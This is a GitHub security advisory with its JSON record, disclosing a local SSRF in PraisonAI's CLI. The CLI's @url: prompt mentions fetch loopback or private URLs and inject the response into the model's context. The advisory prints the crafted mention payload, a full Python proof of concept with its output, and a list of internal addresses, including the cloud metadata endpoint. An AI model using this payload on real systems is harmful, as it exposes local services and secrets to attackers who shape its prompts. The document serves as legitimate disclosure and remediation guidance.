GHSA-5CXW-77WG-JRF3
Vulnerability from github – Published: 2026-05-29 22:29 – Updated: 2026-05-29 22:29Summary
PraisonAI's direct-prompt CLI automatically expands @url: mentions in raw prompt text before agent execution begins.
If a prompt contains @url:<http-or-https-url>, the CLI calls MentionsParser.process(...). The @url: handler then performs a direct urllib.request.urlopen() request to the attacker-controlled URL and returns the response body. That response body is prepended to the final model prompt context.
There is no loopback/private-address restriction, no metadata-service restriction, and no approval gate before the fetch.
As a result, attacker-influenced prompt text can cause the operator's machine to fetch localhost-only HTTP resources and inject the response into model context.
Example:
@url:http://localhost.:8766/ summarize this
````
This causes PraisonAI to make an HTTP request to the local machine and prepend the fetched response body to the prompt that the model receives.
This is a narrow local SSRF / local content disclosure issue in automatic prompt preprocessing. It is not a remote server takeover.
### Details
The affected direct-prompt CLI path is in:
```text
src/praisonai/praisonai/cli/main.py
The CLI imports and instantiates MentionsParser on the direct prompt path:
from praisonaiagents.tools.mentions import MentionsParser
parser = MentionsParser(workspace_path=os.getcwd())
if parser.has_mentions(prompt):
mention_context, prompt = parser.process(prompt)
if mention_context:
prompt = f"{mention_context}# Task:\n{prompt}"
This means raw prompt text is interpreted as a mention language before query rewriting, prompt expansion, tool execution, or LLM invocation.
The affected mention implementation is in:
src/praisonai-agents/praisonaiagents/tools/mentions.py
@url: is a first-class mention type:
PATTERNS = {
"file": re.compile(r'@file:([^\s]+)'),
"web": re.compile(r'@web:([^\s]+(?:\s+[^\s@]+)*)'),
"doc": re.compile(r'@doc:([^\s]+)'),
"rule": re.compile(r'@rule:([^\s]+)'),
"url": re.compile(r'@url:(https?://[^\s]+)'),
}
The URL mention handler performs an unrestricted HTTP request:
req = urllib.request.Request(
url,
headers={'User-Agent': 'Mozilla/5.0 (compatible; PraisonAI/1.0)'}
)
with urllib.request.urlopen(req, timeout=10) as response:
content = response.read().decode('utf-8', errors='ignore')
There is no validation rejecting:
127.0.0.1
localhost
localhost.
private RFC1918 addresses
link-local addresses
cloud metadata endpoints
other local-only HTTP services
The returned body is added to the generated mention context and then prepended to the prompt.
The resulting chain is:
attacker-influenced prompt text
-> @url:http://localhost.:8766/
-> direct-prompt CLI calls MentionsParser.process(...)
-> _process_url_mention(...)
-> urllib.request.urlopen(attacker URL)
-> loopback HTTP response body is read
-> response body is injected into model prompt context
PoC
The following PoC is non-destructive. It starts a local HTTP server on 127.0.0.1:8766, passes a prompt containing @url:http://localhost.:8766/ through the real MentionsParser.process(...) implementation, and confirms that the local response body is injected into the generated prompt context.
Full PoC
#!/usr/bin/env python3
"""Self-contained local replay for PraisonAI CLI @url mention loopback fetch."""
from __future__ import annotations
import sys
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from pathlib import Path
REPO_ROOT = Path(__file__).resolve().parents[3] / "repos" / "praisonai"
PRAISON_ROOT = REPO_ROOT / "src" / "praisonai"
AGENTS_ROOT = REPO_ROOT / "src" / "praisonai-agents"
CLI_MAIN = PRAISON_ROOT / "praisonai/cli/main.py"
MENTIONS = AGENTS_ROOT / "praisonaiagents/tools/mentions.py"
def verify_source() -> None:
expected = {
CLI_MAIN: [
"from praisonaiagents.tools.mentions import MentionsParser",
"if parser.has_mentions(prompt):",
"mention_context, prompt = parser.process(prompt)",
'prompt = f"{mention_context}# Task:\\n{prompt}"',
],
MENTIONS: [
'"url": re.compile(r\'@url:(https?://[^\\s]+)\')',
"def _process_url_mention(self, url: str) -> Optional[str]:",
"with urllib.request.urlopen(req, timeout=10) as response:",
],
}
for path, needles in expected.items():
text = path.read_text(encoding="utf-8")
for needle in needles:
if needle not in text:
raise RuntimeError(f"source verification failed: {needle!r} not found in {path}")
class _Handler(BaseHTTPRequestHandler):
hits: list[tuple[str, str | None]] = []
body = b"<html><body>secret-local-page</body></html>"
def do_GET(self) -> None: # noqa: N802
self.__class__.hits.append((self.path, self.headers.get("Host")))
self.send_response(200)
self.send_header("Content-Type", "text/html; charset=utf-8")
self.send_header("Content-Length", str(len(self.body)))
self.end_headers()
self.wfile.write(self.body)
def log_message(self, format: str, *args) -> None: # noqa: A003
return
def main() -> int:
if not CLI_MAIN.exists() or not MENTIONS.exists():
raise SystemExit("missing local PraisonAI source tree")
verify_source()
sys.path.insert(0, str(AGENTS_ROOT))
from praisonaiagents.tools.mentions import MentionsParser
_Handler.hits.clear()
server = HTTPServer(("127.0.0.1", 8766), _Handler)
thread = threading.Thread(target=server.serve_forever, daemon=True)
thread.start()
try:
parser = MentionsParser(workspace_path="/tmp")
context, cleaned = parser.process("@url:http://localhost.:8766/ summarize this")
finally:
server.shutdown()
server.server_close()
thread.join(timeout=1)
print("[poc] cli_path_verified=yes")
print("[poc] mention_impl_verified=yes")
print(f"[poc] cleaned_prompt={cleaned}")
print(f"[poc] loopback_hit_count={len(_Handler.hits)}")
if _Handler.hits:
print(f"[poc] loopback_host={_Handler.hits[0][1]}")
print(f"[poc] context_contains_secret={'secret-local-page' in context}")
if cleaned != "summarize this":
raise SystemExit(f"[poc] MISS: unexpected cleaned prompt {cleaned!r}")
if not _Handler.hits:
raise SystemExit("[poc] MISS: no loopback HTTP request observed")
if "secret-local-page" not in context:
raise SystemExit("[poc] MISS: local response body was not injected into prompt context")
print("[poc] HIT: @url mention fetched loopback content and injected it into prompt context")
return 0
if __name__ == "__main__":
raise SystemExit(main())
Observed output
[poc] cli_path_verified=yes
[poc] mention_impl_verified=yes
[poc] cleaned_prompt=summarize this
[poc] loopback_hit_count=1
[poc] loopback_host=localhost.:8766
[poc] context_contains_secret=True
[poc] HIT: @url mention fetched loopback content and injected it into prompt context
Expected secure behavior
A prompt-borne @url: mention should not be able to read loopback or private-network resources by default.
At minimum, the following should be rejected before any HTTP request is made:
http://127.0.0.1/
http://localhost/
http://localhost./
http://169.254.169.254/
private RFC1918 addresses
link-local addresses
Actual vulnerable behavior
The loopback request succeeds, and the returned local content is inserted into the generated prompt context.
Impact
An attacker who can influence prompt text passed to PraisonAI's direct-prompt CLI can cause the operator's machine to perform local HTTP requests and inject the fetched response body into the model prompt context.
Potential impact includes:
- reading localhost-only HTTP resources;
- reading local dashboards, admin panels, development servers, or internal web services bound to loopback;
- exposing fetched local content to the model prompt;
- exposing fetched local content through downstream logs, traces, model output, or agent memory depending on the operator workflow.
This report does not claim unauthenticated remote server takeover. The attacker must influence the prompt text that an operator runs with the direct-prompt CLI.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.6.39"
},
"package": {
"ecosystem": "PyPI",
"name": "praisonaiagents"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.6.40"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.6.39"
},
"package": {
"ecosystem": "PyPI",
"name": "PraisonAI"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.6.40"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-47395"
],
"database_specific": {
"cwe_ids": [
"CWE-200"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-29T22:29:47Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Summary\n\nPraisonAI\u0027s direct-prompt CLI automatically expands `@url:` mentions in raw prompt text before agent execution begins.\n\nIf a prompt contains `@url:\u003chttp-or-https-url\u003e`, the CLI calls `MentionsParser.process(...)`. The `@url:` handler then performs a direct `urllib.request.urlopen()` request to the attacker-controlled URL and returns the response body. That response body is prepended to the final model prompt context.\n\nThere is no loopback/private-address restriction, no metadata-service restriction, and no approval gate before the fetch.\n\nAs a result, attacker-influenced prompt text can cause the operator\u0027s machine to fetch localhost-only HTTP resources and inject the response into model context.\n\nExample:\n\n```text\n@url:http://localhost.:8766/ summarize this\n````\n\nThis causes PraisonAI to make an HTTP request to the local machine and prepend the fetched response body to the prompt that the model receives.\n\nThis is a narrow local SSRF / local content disclosure issue in automatic prompt preprocessing. It is not a remote server takeover.\n\n### Details\n\nThe affected direct-prompt CLI path is in:\n\n```text\nsrc/praisonai/praisonai/cli/main.py\n```\n\nThe CLI imports and instantiates `MentionsParser` on the direct prompt path:\n\n```python\nfrom praisonaiagents.tools.mentions import MentionsParser\n\nparser = MentionsParser(workspace_path=os.getcwd())\n\nif parser.has_mentions(prompt):\n mention_context, prompt = parser.process(prompt)\n\nif mention_context:\n prompt = f\"{mention_context}# Task:\\n{prompt}\"\n```\n\nThis means raw prompt text is interpreted as a mention language before query rewriting, prompt expansion, tool execution, or LLM invocation.\n\nThe affected mention implementation is in:\n\n```text\nsrc/praisonai-agents/praisonaiagents/tools/mentions.py\n```\n\n`@url:` is a first-class mention type:\n\n```python\nPATTERNS = {\n \"file\": re.compile(r\u0027@file:([^\\s]+)\u0027),\n \"web\": re.compile(r\u0027@web:([^\\s]+(?:\\s+[^\\s@]+)*)\u0027),\n \"doc\": re.compile(r\u0027@doc:([^\\s]+)\u0027),\n \"rule\": re.compile(r\u0027@rule:([^\\s]+)\u0027),\n \"url\": re.compile(r\u0027@url:(https?://[^\\s]+)\u0027),\n}\n```\n\nThe URL mention handler performs an unrestricted HTTP request:\n\n```python\nreq = urllib.request.Request(\n url,\n headers={\u0027User-Agent\u0027: \u0027Mozilla/5.0 (compatible; PraisonAI/1.0)\u0027}\n)\n\nwith urllib.request.urlopen(req, timeout=10) as response:\n content = response.read().decode(\u0027utf-8\u0027, errors=\u0027ignore\u0027)\n```\n\nThere is no validation rejecting:\n\n```text\n127.0.0.1\nlocalhost\nlocalhost.\nprivate RFC1918 addresses\nlink-local addresses\ncloud metadata endpoints\nother local-only HTTP services\n```\n\nThe returned body is added to the generated mention context and then prepended to the prompt.\n\nThe resulting chain is:\n\n```text\nattacker-influenced prompt text\n -\u003e @url:http://localhost.:8766/\n -\u003e direct-prompt CLI calls MentionsParser.process(...)\n -\u003e _process_url_mention(...)\n -\u003e urllib.request.urlopen(attacker URL)\n -\u003e loopback HTTP response body is read\n -\u003e response body is injected into model prompt context\n```\n\n### PoC\n\nThe following PoC is non-destructive. It starts a local HTTP server on `127.0.0.1:8766`, passes a prompt containing `@url:http://localhost.:8766/` through the real `MentionsParser.process(...)` implementation, and confirms that the local response body is injected into the generated prompt context.\n\n#### Full PoC\n\n```python\n#!/usr/bin/env python3\n\"\"\"Self-contained local replay for PraisonAI CLI @url mention loopback fetch.\"\"\"\n\nfrom __future__ import annotations\n\nimport sys\nimport threading\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nfrom pathlib import Path\n\n\nREPO_ROOT = Path(__file__).resolve().parents[3] / \"repos\" / \"praisonai\"\nPRAISON_ROOT = REPO_ROOT / \"src\" / \"praisonai\"\nAGENTS_ROOT = REPO_ROOT / \"src\" / \"praisonai-agents\"\nCLI_MAIN = PRAISON_ROOT / \"praisonai/cli/main.py\"\nMENTIONS = AGENTS_ROOT / \"praisonaiagents/tools/mentions.py\"\n\n\ndef verify_source() -\u003e None:\n expected = {\n CLI_MAIN: [\n \"from praisonaiagents.tools.mentions import MentionsParser\",\n \"if parser.has_mentions(prompt):\",\n \"mention_context, prompt = parser.process(prompt)\",\n \u0027prompt = f\"{mention_context}# Task:\\\\n{prompt}\"\u0027,\n ],\n MENTIONS: [\n \u0027\"url\": re.compile(r\\\u0027@url:(https?://[^\\\\s]+)\\\u0027)\u0027,\n \"def _process_url_mention(self, url: str) -\u003e Optional[str]:\",\n \"with urllib.request.urlopen(req, timeout=10) as response:\",\n ],\n }\n\n for path, needles in expected.items():\n text = path.read_text(encoding=\"utf-8\")\n for needle in needles:\n if needle not in text:\n raise RuntimeError(f\"source verification failed: {needle!r} not found in {path}\")\n\n\nclass _Handler(BaseHTTPRequestHandler):\n hits: list[tuple[str, str | None]] = []\n body = b\"\u003chtml\u003e\u003cbody\u003esecret-local-page\u003c/body\u003e\u003c/html\u003e\"\n\n def do_GET(self) -\u003e None: # noqa: N802\n self.__class__.hits.append((self.path, self.headers.get(\"Host\")))\n self.send_response(200)\n self.send_header(\"Content-Type\", \"text/html; charset=utf-8\")\n self.send_header(\"Content-Length\", str(len(self.body)))\n self.end_headers()\n self.wfile.write(self.body)\n\n def log_message(self, format: str, *args) -\u003e None: # noqa: A003\n return\n\n\ndef main() -\u003e int:\n if not CLI_MAIN.exists() or not MENTIONS.exists():\n raise SystemExit(\"missing local PraisonAI source tree\")\n\n verify_source()\n\n sys.path.insert(0, str(AGENTS_ROOT))\n from praisonaiagents.tools.mentions import MentionsParser\n\n _Handler.hits.clear()\n\n server = HTTPServer((\"127.0.0.1\", 8766), _Handler)\n thread = threading.Thread(target=server.serve_forever, daemon=True)\n thread.start()\n\n try:\n parser = MentionsParser(workspace_path=\"/tmp\")\n context, cleaned = parser.process(\"@url:http://localhost.:8766/ summarize this\")\n finally:\n server.shutdown()\n server.server_close()\n thread.join(timeout=1)\n\n print(\"[poc] cli_path_verified=yes\")\n print(\"[poc] mention_impl_verified=yes\")\n print(f\"[poc] cleaned_prompt={cleaned}\")\n print(f\"[poc] loopback_hit_count={len(_Handler.hits)}\")\n\n if _Handler.hits:\n print(f\"[poc] loopback_host={_Handler.hits[0][1]}\")\n\n print(f\"[poc] context_contains_secret={\u0027secret-local-page\u0027 in context}\")\n\n if cleaned != \"summarize this\":\n raise SystemExit(f\"[poc] MISS: unexpected cleaned prompt {cleaned!r}\")\n\n if not _Handler.hits:\n raise SystemExit(\"[poc] MISS: no loopback HTTP request observed\")\n\n if \"secret-local-page\" not in context:\n raise SystemExit(\"[poc] MISS: local response body was not injected into prompt context\")\n\n print(\"[poc] HIT: @url mention fetched loopback content and injected it into prompt context\")\n return 0\n\n\nif __name__ == \"__main__\":\n raise SystemExit(main())\n```\n\n#### Observed output\n\n```text\n[poc] cli_path_verified=yes\n[poc] mention_impl_verified=yes\n[poc] cleaned_prompt=summarize this\n[poc] loopback_hit_count=1\n[poc] loopback_host=localhost.:8766\n[poc] context_contains_secret=True\n[poc] HIT: @url mention fetched loopback content and injected it into prompt context\n```\n\n#### Expected secure behavior\n\nA prompt-borne `@url:` mention should not be able to read loopback or private-network resources by default.\n\nAt minimum, the following should be rejected before any HTTP request is made:\n\n```text\nhttp://127.0.0.1/\nhttp://localhost/\nhttp://localhost./\nhttp://169.254.169.254/\nprivate RFC1918 addresses\nlink-local addresses\n```\n\n#### Actual vulnerable behavior\n\nThe loopback request succeeds, and the returned local content is inserted into the generated prompt context.\n\n### Impact\n\nAn attacker who can influence prompt text passed to PraisonAI\u0027s direct-prompt CLI can cause the operator\u0027s machine to perform local HTTP requests and inject the fetched response body into the model prompt context.\n\nPotential impact includes:\n\n* reading localhost-only HTTP resources;\n* reading local dashboards, admin panels, development servers, or internal web services bound to loopback;\n* exposing fetched local content to the model prompt;\n* exposing fetched local content through downstream logs, traces, model output, or agent memory depending on the operator workflow.\n\nThis report does not claim unauthenticated remote server takeover. The attacker must influence the prompt text that an operator runs with the direct-prompt CLI.",
"id": "GHSA-5cxw-77wg-jrf3",
"modified": "2026-05-29T22:29:47Z",
"published": "2026-05-29T22:29:47Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-5cxw-77wg-jrf3"
},
{
"type": "PACKAGE",
"url": "https://github.com/MervinPraison/PraisonAI"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "PraisonAI CLI automatically resolves @url mentions in prompt text and can read loopback URLs into model context"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.